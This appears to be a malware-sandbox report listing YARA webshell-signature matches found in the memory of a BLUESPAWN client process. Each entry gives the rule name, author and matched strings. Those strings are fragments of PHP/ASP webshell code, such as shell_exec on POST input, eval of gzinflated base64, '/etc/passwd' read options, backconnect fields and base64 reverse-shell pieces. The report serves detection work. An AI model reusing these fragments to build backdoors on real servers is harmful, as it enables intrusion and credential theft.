- 0x3461f9:$s1: .$arrow."</b>",in('text','
- 0x358553:$s1: .$arrow."</b>",in('text','
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0013 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x300088:$s0: 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
- 0x3000ce:$s1: $name='ec371748dc2da624b35a4f8f685dd122'
- 0x3586f7:$s1: $name='ec371748dc2da624b35a4f8f685dd122'
- 0x2f4fc6:$s2: rst.void.ru
- 0x2fbecb:$s2: rst.void.ru
- 0x2fbeef:$s2: rst.void.ru
- 0x300103:$s2: rst.void.ru
- 0x3502e8:$s2: rst.void.ru
- 0x3556e7:$s2: rst.void.ru
- 0x355701:$s2: rst.void.ru
- 0x358722:$s2: rst.void.ru
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0014 | Semi-Auto-generated - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x300356:$s0: echo ws(2).$lb." <a
- 0x3588b5:$s0: echo ws(2).$lb." <a
- 0x300376:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x31888c:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x3588cb:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x36a38f:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x3003b4:$s3: if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("l
- 0x3588ff:$s3: if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("l
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x300645:$s0: if(eregi("./shbd $por",$scan))
- 0x358ad0:$s0: if(eregi("./shbd $por",$scan))
- 0x300670:$s1: $_POST['backconnectip']
- 0x324549:$s1: $_POST['backconnectip']
- 0x358af1:$s1: $_POST['backconnectip']
- 0x3726da:$s1: $_POST['backconnectip']
- 0x300694:$s2: $_POST['backcconnmsg']
- 0x358b0b:$s2: $_POST['backcconnmsg']
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0016 | Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30094e:$s1: if(rmdir($_POST['mk_name']))
- 0x358ceb:$s1: if(rmdir($_POST['mk_name']))
- 0x300977:$s2: $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>
- 0x358d0a:$s2: $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>
- 0x3009d2:$s3: if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cell
- 0x358d5b:$s3: if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cell
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0017 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x300c76:$s0: "ext_avi"=>array("ext_avi","ext_mov","ext_mvi
- 0x358f3f:$s0: "ext_avi"=>array("ext_avi","ext_mov","ext_mvi
- 0x300cb0:$s1: echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><inpu
- 0x358f6f:$s1: echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><inpu
- 0x300d03:$s2: "ext_htaccess"=>array("ext_htaccess","ext_htpasswd
- 0x358fb8:$s2: "ext_htaccess"=>array("ext_htaccess","ext_htpasswd
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_php_webshells | Semi-Auto-generated - from files multiple_php_webshells | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2eacb6:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x301068:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3490dd:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3591db:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3010c5:$s2: sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0
- 0x35922e:$s2: sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0
- 0x301122:$s4: A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg
- 0x359281:$s4: A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0019 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x301372:$s0: <b>Dumped! Dump has been writed to
- 0x35942b:$s0: <b>Dumped! Dump has been writed to
- 0x3013a2:$s1: if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE st
- 0x359451:$s1: if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE st
- 0x3013fe:$s2: <input type=submit name=actarcbuff value=\"Pack buffer to archive
- 0x3594a3:$s2: <input type=submit name=actarcbuff value=\"Pack buffer to archive
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0020 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30168c:$s0: @ini_set("highlight
- 0x3016ac:$s1: echo "<b>Result of execution this PHP-code</b>:<br>";
- 0x3016ee:$s2: {$row[] = "<b>Owner/Group</b>";}
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0021 | Semi-Auto-generated - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30192c:$s2: echo $uname."</font><br><b>";
- 0x301956:$s3: while(!feof($f)) { $res.=fread($f,1024); }
- 0x30198d:$s4: echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()
- 0x35988a:$s4: echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0022 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x301c33:$s0: c99ftpbrutecheck
- 0x359a56:$s0: c99ftpbrutecheck
- 0x301c50:$s1: $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
- 0x301c90:$s2: $fqb_lenght = $nixpwdperpage;
- 0x301cba:$s3: $sock = @ftp_connect($host,$port,$timeout);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0023 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x301f31:$s0: $sqlquicklaunch[] = array("
- 0x359c5c:$s0: $sqlquicklaunch[] = array("
- 0x301f59:$s1: else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!<
- 0x359c7a:$s1: else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!<
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0024 | Semi-Auto-generated - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3021a6:$s0: if(@$_POST['save'])writef($file,$_POST['data']);
- 0x3021e3:$s1: if($action=="phpeval"){
- 0x302207:$s2: $uploadfile = $dirupload."/".$_POST['filename'];
- 0x302244:$s3: $dir=getcwd()."/";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0025 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x302444:$s3: if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0026 | Semi-Auto-generated - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x302681:$s0: if ($filename != "." and $filename != ".."){
- 0x311a3b:$s0: if ($filename != "." and $filename != ".."){
- 0x3026ba:$s1: $dires = $dires . $directory;
- 0x3026e4:$s4: $arr = array_merge($arr, glob("*"));
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0027 | Semi-Auto-generated - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30295c:$s0: @$rto=$_POST['rto'];
- 0x30297d:$s2: SCROLLBAR-TRACK-COLOR: #91AAFF
- 0x3029a8:$s3: $to1=str_replace("//","/",$to1);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0028 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x302c31:$s0: if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":
- 0x35a580:$s0: if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":
- 0x302c86:$s1: $group["execute"] = ($mode & 00010)?"x":"-";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0029 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x302f41:$s0: $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_php_webshells_2 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x303249:$s0: elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. I
- 0x35a98c:$s0: elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. I
- 0x3032a3:$s1: else {echo "<center><b>Unknown extension (".$ext."), please, select type ma
- 0x35a9dc:$s1: else {echo "<center><b>Unknown extension (".$ext."), please, select type ma
- 0x3032fb:$s3: $s = "!^(".implode("|",$tmp).")$!i";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0030 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x303569:$s0: if ($total === FALSE) {$total = 0;}
- 0x303599:$s1: $free_percent = round(100/($total/$free),2);
- 0x3035d2:$s2: if (!$bool) {$bool = is_dir($letter.":\\");}
- 0x30360b:$s3: $bool = $isdiskette = in_array($letter,$safemode_diskettes);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0031 | Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x303883:$s0: $res = mssql_query("select * from r57_temp_table",$db);
- 0x3038c7:$s2: 'eng_text30'=>'Cat file',
- 0x3038ed:$s3: @mssql_query("drop table r57_temp_table",$db);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0032 | Semi-Auto-generated - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x303b3e:$s0: $num = $nixpasswd + $nixpwdperpage;
- 0x303b6e:$s1: $ret = posix_kill($pid,$sig);
- 0x303b98:$s2: if ($uid) {echo join(":",$uid)."<br>";}
- 0x303bcc:$s3: $i = $nixpasswd;
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DarkSecurityTeam_Webshell | Dark Security Team Webshell | Florian Roth | - 0x303d2a:$s0: form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value="""&HtmlEncode(Server.MapPath("."))&
- 0x35b134:$s0: form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value="""&HtmlEncode(Server.MapPath("."))&
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_Cloaked_Webshell_SuperFetchExec | Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC | Florian Roth | - 0x303f17:$s0: else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);
- 0x35b295:$s0: else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_RemExp_asp_php | PHP Webshells Github Archive - file RemExp.asp.php.txt | Florian Roth | - 0x30408d:$s0: lsExt = Right(FileName, Len(FileName) - liCount)
- 0x2f4936:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x3040ca:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x31904d:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x34fe02:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x35b3d0:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x36a8d0:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x304122:$s13: Response.Write Drive.ShareName & " [share]"
- 0x30415a:$s19: If Request.QueryString("CopyFile") <> "" Then
- 0x304194:$s20: <td width="40%" height="20" bgcolor="silver"> Name</td>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_dC3_Security_Crew_Shell_PRiV | PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php | Florian Roth | - 0x304325:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x30b63c:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x30436a:$s4: $ps=str_replace("\\","/",getenv('DOCUMENT_ROOT'));
- 0x3043a9:$s5: header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
- 0x3043eb:$s15: search_file($_POST['search'],urldecode($_POST['dir']));
- 0x30442f:$s16: echo base64_decode($images[$_GET['pic']]);
- 0x304466:$s20: if (isset($_GET['rename_all'])) {
- 0x30b735:$s20: if (isset($_GET['rename_all'])) {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_simattacker | PHP Webshells Github Archive - file simattacker.php | Florian Roth | - 0x3045be:$s1: $from = rand (71,1020000000)."@"."Attacker.com";
- 0x3045fb:$s4: Turkish Hackers : WWW.ALTURKS.COM <br>
- 0x304634:$s5: Programer : SimAttacker - Edited By KingDefacer<br>
- 0x30467a:$s6: //fake mail = Use victim server 4 DOS - fake mail
- 0x305a8f:$s6: //fake mail = Use victim server 4 DOS - fake mail
- 0x3046b9:$s10: e-mail : kingdefacer@msn.com<br>
- 0x3046ec:$s17: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x305b1d:$s17: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x304728:$s18: echo "<font size='1' color='#999999'>Dont in windows";
- 0x305b59:$s18: echo "<font size='1' color='#999999'>Dont in windows";
- 0x30476b:$s20: $Comments=$_POST['Comments'];
- 0x305b9c:$s20: $Comments=$_POST['Comments'];
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_DTool_Pro | PHP Webshells Github Archive - file DTool Pro.php | Florian Roth | - 0x3048bb:$s1: function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pront
- 0x35b9eb:$s1: function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pront
- 0x304917:$s2: <font size=3>by r3v3ng4ns - revengans@gmail.com </font>
- 0x30495b:$s3: function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDig
- 0x35ba77:$s3: function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDig
- 0x3049b6:$s11: //Turns the 'ls' command more usefull, showing it as it looks in the shell
- 0x304a0d:$s13: if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
- 0x304a64:$s14: //To keep the changes in the url, when using the 'GET' way to send php variables
- 0x304ac1:$s16: function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite
- 0x35bbb9:$s16: function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite
- 0x304b1c:$s18: if(empty($fu)) $fu = @$_GET['fu'];
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_ironshell | PHP Webshells Github Archive - file ironshell.php | Florian Roth | - 0x304c71:$s0: <title>'.getenv("HTTP_HOST").' ~ Shell I</title>
- 0x304cae:$s2: $link = mysql_connect($_POST['host'], $_POST['username'], $_POST
- 0x35bd25:$s2: $link = mysql_connect($_POST['host'], $_POST['username'], $_POST
- 0x304cfb:$s4: error_reporting(0); //If there is an error, we'll show it, k?
- 0x304d45:$s8: print "<form action=\"".$me."?p=chmod&file=".$content."&d
- 0x35bda8:$s8: print "<form action=\"".$me."?p=chmod&file=".$content."&d
- 0x304d8b:$s15: if(!is_numeric($_POST['timelimit']))
- 0x304dbc:$s16: if($_POST['chars'] == "9999")
- 0x304de6:$s17: <option value=\"az\">a - zzzzz</option>
- 0x304e1a:$s18: print shell_exec($command);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_indexer_asp_php | PHP Webshells Github Archive - file indexer.asp.php.txt | Florian Roth | - 0x304f74:$s0: <meta http-equiv="Content-Language" content="tr">
- 0x304fb2:$s1: <title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
- 0x304ff5:$s2: <form action="?Gonder" method="post">
- 0x305027:$s4: <form action="?oku" method="post">
- 0x305056:$s7: var message="SaNaLTeRoR -
- 0x30507d:$s8: nDexEr - Reader"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_toolaspshell | PHP Webshells Github Archive - file toolaspshell.php | Florian Roth | - 0x3051c6:$s0: cprthtml = "<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef
- 0x35c0f7:$s0: cprthtml = "<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef
- 0x305222:$s12: barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
- 0x30526a:$s20: destino3 = folderItem.path & "\index.asp"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_b374k_mini_shell_php_php | PHP Webshells Github Archive - file b374k-mini-shell-php.php.php | Florian Roth | - 0x3053e4:$s0: @error_reporting(0);
- 0x305405:$s2: @eval(gzinflate(base64_decode($code)));
- 0x305439:$s3: @set_time_limit(0);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Sincap_1_0 | PHP Webshells Github Archive - file Sincap 1.0.php | Florian Roth | - 0x305582:$s4: </font></span><a href="mailto:shopen@aventgrup.net">
- 0x3055c3:$s5: <title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B
- 0x305609:$s9: </span>Avrasya Veri ve NetWork Teknolojileri Geli
- 0x305647:$s12: while (($ekinci=readdir ($sedat))){
- 0x305677:$s19: $deger2= "$ich[$tampon4]";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_b374k_php | PHP Webshells Github Archive - file b374k.php.php | Florian Roth | - 0x3057c4:$s0: // encrypt your password to md5 here http://kerinci.net/?x=decode
- 0x305812:$s6: // password (default is: b374k)
- 0x35c5a3:$s6: // password (default is: b374k)
- 0x30583e:$s8: //******************************************************************************
- 0x35c5c5:$s8: //******************************************************************************
- 0x30589b:$s9: // b374k 2.2
- 0x3058b4:$s10: eval("?>".gzinflate(base64_decode(
- 0x35c628:$s10: eval("?>".gzinflate(base64_decode(
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend | PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php | Florian Roth | - 0x305a53:$s4: Iranian Hackers : WWW.SIMORGH-EV.COM <br>
- 0x30467a:$s5: //fake mail = Use victim server 4 DOS - fake mail
- 0x305a8f:$s5: //fake mail = Use victim server 4 DOS - fake mail
- 0x305ace:$s10: <a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
- 0x3046ec:$s16: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x305b1d:$s16: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x304728:$s17: echo "<font size='1' color='#999999'>Dont in windows";
- 0x305b59:$s17: echo "<font size='1' color='#999999'>Dont in windows";
- 0x30476b:$s19: $Comments=$_POST['Comments'];
- 0x305b9c:$s19: $Comments=$_POST['Comments'];
- 0x305bc6:$s20: Victim Mail :<br><input type='text' name='to' ><br>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_h4ntu_shell__powered_by_tsoi_ | PHP Webshells Github Archive - file h4ntu shell [powered by tsoi | unknown | - 0x305d54:$s11: <title>h4ntu shell [powered by tsoi]</title>
- 0x305d8d:$s13: $cmd = $_POST['cmd'];
- 0x3062e5:$s13: $cmd = $_POST['cmd'];
- 0x305daf:$s16: $uname = posix_uname( );
- 0x2f3658:$s17: if(!$whoami)$whoami=exec("whoami");
- 0x305dd4:$s17: if(!$whoami)$whoami=exec("whoami");
- 0x305e04:$s18: echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>
- 0x35ca42:$s18: echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>
- 0x305e60:$s20: ob_end_clean();
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_MyShell | PHP Webshells Github Archive - file MyShell.php | Florian Roth | - 0x305fac:$s3: <title>MyShell error - Access Denied</title>
- 0x305fe5:$s4: $adminEmail = "youremail@yourserver.com";
- 0x30601b:$s5: //A workdir has been asked for - we chdir to that dir.
- 0x30605e:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x30da97:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x35cc07:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x3628a0:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x3060b6:$s13: #$autoErrorTrap Enable automatic error traping if command returns error.
- 0x30610b:$s14: /* No work_dir - we chdir to $DOCUMENT_ROOT */
- 0x306146:$s19: #every command you excecute.
- 0x30616f:$s20: <form name="shell" method="post">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_webshells_pws | PHP Webshells Github Archive - file pws.php | Florian Roth | - 0x3062c5:$s6: if ($_POST['cmd']){
- 0x305d8d:$s7: $cmd = $_POST['cmd'];
- 0x3062e5:$s7: $cmd = $_POST['cmd'];
- 0x306307:$s10: echo "FILE UPLOADED TO $dez";
- 0x306331:$s11: if (file_exists($uploaded)) {
- 0x30635b:$s12: copy($uploaded, $dez);
- 0x30637e:$s17: passthru($cmd);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_reader_asp_php | PHP Webshells Github Archive - file reader.asp.php.txt | Florian Roth | - 0x3064ca:$s5: ster" name=submit> </Font> <a href=mailto:mailbomb@hotmail
- 0x35cf45:$s5: ster" name=submit> </Font> <a href=mailto:mailbomb@hotmail
- 0x306526:$s12: HACKING
- 0x30653c:$s16: FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT:
- 0x35cfa5:$s16: FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT:
- 0x306599:$s20: PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG
- 0x35cff9:$s20: PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 | PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php | Florian Roth | - 0x30675a:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x30918e:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x30679b:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x30922d:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x3067c7:$s9: ".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.
- 0x35d1a5:$s9: ".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.
- 0x306822:$s11: die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
- 0x30685d:$s15: if(empty($_GET['file'])){
- 0x306883:$s16: echo "<head><title>Safe Mode Shell</title></head>";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x306a4e:$s4: $liz0zim=shell_exec($_POST[liz0]);
- 0x306a7e:$s6: $liz0=shell_exec($_POST[baba]);
- 0x306aab:$s9: echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E
- 0x35d3ec:$s9: echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E
- 0x306b07:$s12: :=) :</font><select size="1" name="liz0">
- 0x2ddc66:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
- 0x306b3e:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_php_backdoor | PHP Webshells Github Archive - file php-backdoor.php | Florian Roth | - 0x306cab:$s5: http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
- 0x306cf3:$s6: // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi
- 0x35d5aa:$s6: // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi
- 0x306d50:$s11: if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
- 0x306d98:$s13: else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
- 0x2e18c2:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x306de2:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x342ff3:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x35d67e:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
|
